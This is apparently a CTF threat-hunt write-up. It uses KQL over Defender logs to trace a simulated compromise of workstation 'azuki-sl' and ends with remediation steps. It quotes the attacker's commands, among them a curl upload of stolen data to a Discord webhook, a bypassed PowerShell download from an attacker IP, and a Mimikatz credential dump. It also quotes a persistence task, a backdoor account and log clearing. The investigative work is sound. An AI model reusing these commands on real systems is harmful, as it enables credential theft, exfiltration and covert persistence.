CTF — Threat Hunt — Tyler Droxler

Scenario

A competitor undercut a six-year shipping contract by exactly 3%. Supplier contracts and pricing data subsequently appeared on underground forums. Azuki Import Export Trading Co. (23 employees, operations in Japan and Southeast Asia) reported a suspected compromise.

Microsoft Defender for Endpoint logs from the IT administrator workstation "azuki-sl" showed signs of remote access, staged tooling, credential theft, data compression, exfiltration, and log clearing across a window of November 19–20, 2025. The objective was to use MDE telemetry and KQL to trace every stage of the attack and answer 20 specific flags.

Flags

Flag 01 — Initial Access

Identify the source IP address of the Remote Desktop Protocol connection.

KQL

DeviceNetworkEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where LocalPort == 3389

On November 19, 2025 at 1:35:56 PM, an RDP connection was accepted on local port 3389 from a remote IP.

Answer 88.97.178.12

Flag 02 — Initial Access

Identify the user account that was compromised for initial access.

KQL

DeviceNetworkEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where LogonType has_any ("RemoteInteractive")
| where ActionType == "LogonSuccess"

A successful remote login occurred approximately 30 seconds after the RDP connection was established.

Answer kenji.sato

Flag 03 — Discovery

Identify the command and argument used to enumerate network neighbours.

KQL

DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where ProcessCommandLine has_any ("arp", "ip", "nmap", "net")
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine

At 2:04:01 PM, the attacker executed ARP to view the ARP table and enumerate local network device addresses.

Answer "ARP.EXE" -a

Flag 04 — Evasion

Identify the primary staging directory where malware was stored.

KQL

DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine

At 2:05:33 PM, the attacker ran attrib.exe +h +s C:\ProgramData\WindowsCache, setting the directory as hidden and system-protected to prevent casual detection.

Answer C:\ProgramData\WindowsCache

Flag 05 — Evasion

How many file extensions were excluded from Windows Defender scanning?

KQL

DeviceRegistryEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where RegistryKey has_any ("Defender")
| project Timestamp, ActionType, RegistryKey, RegistryValueName, RegistryValueData

At 1:49:27 PM, the attacker modified Windows Defender exclusions to allow .bat, .ps1, and .exe — enabling execution of these file types without triggering detection.

Answer 3 (.bat, .ps1, .exe)

Flag 06 — Evasion

What temporary folder path was excluded from Windows Defender scanning?

KQL

DeviceRegistryEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where RegistryValueName has_any ("Temp")
| project Timestamp, ActionType, RegistryKey, RegistryValueName, RegistryValueData

Answer C:\Users\KENJI~1.SAT\AppData\Local\Temp

Flag 07 — Evasion

Identify the Windows-native binary the attacker abused to download files.

KQL

DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FileName in ("bitsadmin.exe","certutil.exe","powershell.exe","mshta.exe",
    "rundll32.exe","regsvr32.exe","wscript.exe","cscript.exe","curl.exe","ftp.exe","explorer.exe")
| project Timestamp, FileName, FolderPath, InitiatingProcessCommandLine

At 2:06:58 PM, certutil.exe was used to stage a malicious script, then executed via PowerShell with execution policy bypass — abusing trusted system binaries to evade detection.

Answer certutil.exe

Flag 08 — Persistence

Identify the name of the scheduled task created for persistence.

KQL

DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FileName has_any ("schtasks.exe", "powershell.exe", "cmd.exe")
| project Timestamp, FileName, FolderPath, ProcessCommandLine, InitiatingProcessCommandLine

At 2:07:46 PM, a scheduled task was created using: schtasks.exe /create /tn "Windows Update Check" /tr C:\ProgramData\WindowsCache\svchost.exe /sc daily /st 02:00 /ru SYSTEM /f — running daily at 2:00 AM under SYSTEM privileges.

Answer Windows Update Check

Flag 09 — Persistence

Identify the executable path configured in the scheduled task.

Derived from the same event as Flag 08.

Answer C:\ProgramData\WindowsCache\svchost.exe

Flag 10 — Command & Control

Identify the IP address of the command and control server.

KQL

DeviceNetworkEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| project Timestamp, RemoteIP, RemotePort, InitiatingProcessCommandLine

At 2:11:04 PM, the malicious svchost.exe established a network connection to the C2 server over port 443.

Answer 78.141.196.6

Flag 11 — Command & Control

Identify the destination port used for command and control communications.

Derived from the same event as Flag 10.

Answer 443

Flag 12 — Credential Access

Identify the filename of the credential dumping tool.

KQL

DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FolderPath contains "WindowsCache"
| project Timestamp, FileName, FolderPath, ProcessCommandLine

At 2:08:26 PM, a renamed version of Mimikatz was executed with the command: "mm.exe" privilege::debug sekurlsa::logonpasswords exit

Answer mm.exe

Flag 13 — Credential Access

Identify the module used to extract logon passwords from memory.

Derived from the same event as Flag 12.

Answer sekurlsa::logonpasswords

Flag 14 — Collection

Identify the compressed archive filename used for data exfiltration.

KQL

DeviceFileEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FolderPath contains "WindowsCache"
| project Timestamp, FileName, FolderPath

At 2:08:58 PM, a file was created in the staging directory shortly after running the credential dumping tool.

Answer export-data.zip

Flag 15 — Exfiltration

Identify the cloud service used to exfiltrate stolen data.

KQL

DeviceNetworkEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where RemotePort in (443, 20, 21, 22)
| project Timestamp, RemoteIP, RemotePort, RemoteUrl

At 2:09:21 PM, the attacker exfiltrated data via HTTPS using curl: curl.exe -F file=@C:\ProgramData\WindowsCache\export-data.zip https://discord.com/api/webhooks/...

Answer Discord

Flag 16 — Anti-Forensics

Identify the first Windows event log cleared by the attacker.

KQL

DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where ProcessCommandLine has "wevtutil.exe"
| project Timestamp, FileName, FolderPath, ProcessCommandLine

At 2:11:39 PM, the attacker cleared Security event logs, followed by System and Application logs.

Answer Security

Flag 17 — Impact

Identify the backdoor account username created by the attacker.

KQL

DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where ProcessCommandLine contains "add"
| project Timestamp, FileName, FolderPath, ProcessCommandLine

At 2:09:48 PM, the attacker used net.exe user support ********* /add to create a new backdoor account named "support" — a generic name chosen to blend in.

Answer support

Flag 18 — Execution

Identify the PowerShell script file used to automate the attack chain.

KQL

DeviceFileEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FileName has_any (".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta")
| project Timestamp, FileName, FolderPath, InitiatingProcessCommandLine, ActionType

At 1:49:48 PM, the attacker ran: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://78.141.196.6:8080/wupdate.ps1' -OutFile 'C:\Users\KENJI~1.SAT\AppData\Local\Temp\wupdate.ps1'"

Answer wupdate.ps1

Flag 19 — Lateral Movement

What IP address was targeted for lateral movement?

KQL

DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where ProcessCommandLine has_any ("cmdkey", "mstsc")
| project Timestamp, FileName, FolderPath, ProcessCommandLine, ActionType

At 2:10:41 PM, the attacker launched a remote desktop session to a secondary target machine.

Answer 10.1.0.188

Flag 20 — Lateral Movement

Identify the remote access tool used for lateral movement.

Derived from the same event as Flag 19.

Answer mstsc.exe

Event Timeline

Nov 19 · 1:35:56 PM

RDP inbound connection accepted from 88.97.178.12 to "azuki-sl" over port 3389

Nov 19 · 1:36:21 PM

Attacker successfully logged into account kenji.sato

Nov 19 · 1:49:27 PM

Windows Defender exclusions added for .bat, .ps1, .exe and temp path C:\Users\kenji.sato\AppData\Local\Temp

Nov 19 · 1:49:48 PM

PowerShell Invoke-WebRequest downloads wupdate.ps1 from 78.141.196.6:8080 to the temp folder

Nov 19 · 2:04:01 PM

ARP.EXE -a executed to enumerate local network hosts

Nov 19 · 2:05:33 PM

attrib.exe used to set C:\ProgramData\WindowsCache as hidden and system-protected

Nov 19 · 2:06:58 PM

certutil.exe and PowerShell used to stage and execute payloads

Nov 19 · 2:07:46 PM

Scheduled task "Windows Update Check" created to run C:\ProgramData\WindowsCache\svchost.exe as SYSTEM daily at 2:00 AM

Nov 19 · 2:08:26 PM

mm.exe (Mimikatz) executed with sekurlsa::logonpasswords to dump credentials

Nov 19 · 2:08:58 PM

export-data.zip created in ProgramData\WindowsCache

Nov 19 · 2:09:21 PM

curl.exe posts export-data.zip to a Discord webhook — data exfiltrated

Nov 19 · 2:09:48 PM

Backdoor account "support" created via net.exe to maintain persistent access

Nov 19 · 2:10:41 PM

mstsc.exe launched to initiate RDP lateral movement to 10.1.0.188

Nov 19 · 2:11:04 PM

Malicious svchost.exe connects to C2 server 78.141.196.6 on port 443

Nov 19 · 2:11:39 PM

wevtutil.exe cl Security executed — Security, System, and Application event logs cleared

Summary

On November 19, 2025, an attacker gained access to the system "azuki-sl" via an inbound RDP connection from IP 88.97.178.12 and successfully authenticated as kenji.sato. Shortly after, they disabled protections by adding Windows Defender exclusions for script and executable files and the user's temp directory.

Using PowerShell, they downloaded a malicious script (wupdate.ps1) from a remote server. They then performed network reconnaissance via ARP, concealed a staging directory using system attributes, and executed payloads via certutil and PowerShell. Persistence was established through a scheduled task that ran malicious svchost.exe daily under SYSTEM privileges.

Mimikatz (mm.exe) dumped credentials from memory, the stolen data was packaged into export-data.zip, and exfiltrated via curl to a Discord webhook. A backdoor account "support" was created, and the malicious svchost connected back to the C2 server over port 443. Finally, event logs were cleared using wevtutil to cover tracks — a full compromise spanning credential theft, persistence, exfiltration, lateral movement, and anti-forensics.

Remediation & Response

Isolate the compromised host and block attacker IPs at the perimeter
Disable the kenji.sato and support accounts; reset all passwords
Remove malicious files, hidden folders, scheduled tasks, and Defender exclusions
Audit persistence mechanisms and sweep for lateral movement across adjacent systems
Restore logging, forward logs to a SIEM, and monitor for tool abuse (certutil, mstsc, wevtutil)
Patch all systems, restrict RDP to trusted sources only, and enforce MFA
Conduct threat hunting for remaining indicators of compromise
Document the incident and strengthen defenses with least privilege and network segmentation

Capture The Flag:Threat Hunt

Scenario

Flags

Event Timeline

Summary

Remediation & Response

Capture The Flag:
Threat Hunt